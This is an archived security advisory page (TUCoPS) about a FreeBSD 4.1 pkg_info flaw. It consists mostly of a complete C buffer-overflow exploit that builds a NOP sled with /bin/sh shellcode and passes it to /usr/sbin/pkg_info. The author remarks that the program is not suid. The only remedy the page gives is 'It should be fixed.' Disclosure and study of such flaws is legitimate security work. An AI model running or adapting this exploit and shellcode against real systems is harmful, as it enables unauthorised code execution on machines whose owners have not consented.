TUCoPS :: BSD :: pkginfo.htm

TUCoPS :: BSD :: pkginfo.htm
FreeBSD pkginfo vulnerability
Vulnerability

    pkginfo

Affected

    FreeBSD 4.1

Description

    'visi0n' posted following.

    /*
     *	FreeBSD 4.1 x86 pkg_info exploit.
     *	anthrax# ./AUX-pkg_info 4301 2000
     *	Author: visi0n.
     *	AUX TECHNOLOGIES BRASIL.
     *	Comments: This is for fun, because pkg_info isnt suid.
     */
    
    #include <stdio.h>
    #include <string.h>
    
    #define OFFSET			0
    #define BUFFER_SIZE		4301
    #define NOP			0x90
    
    char shellcode[]=
    "\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76"
    "\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b"
    "\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff"
    "\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff"
    "\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02"
    "\x02\x02\x02/bin/sh.-c.sh";
    
    unsigned long get_esp()
    {
	    __asm__("movl %esp,%eax");
    }
    
    void main(int argc, char *argv[])
    {
	    char *buff, *ptr;
	    long *addr_ptr, addr;
	    int offset = OFFSET, bsize = BUFFER_SIZE;
	    int i;
    
	    if (argc > 1) bsize = atoi(argv[1]);
	    if (argc > 2) offset = atoi(argv[2]);
    
	    buff = malloc(bsize);
    
	    addr = get_esp() - offset;
	    printf("0x%x\n", addr);
    
	    ptr = buff;
	    addr_ptr = (long *)ptr;
    
	    for (i = 0; i < bsize; i += 4)
		    *(addr_ptr++) = addr;
    
	    for (i = 0; i < bsize/2; i++)
		    buff[i] = NOP;
    
	    ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
    
	    for (i = 0; i < strlen(shellcode); i++)
		    *(ptr++) = shellcode[i];
    
	    buff[bsize -1] = '\0';
	    printf("%d\n", strlen(buff));
	    execl("/usr/sbin/pkg_info", "pkg_info", buff, 0);
    }

Solution

    It should be fixed.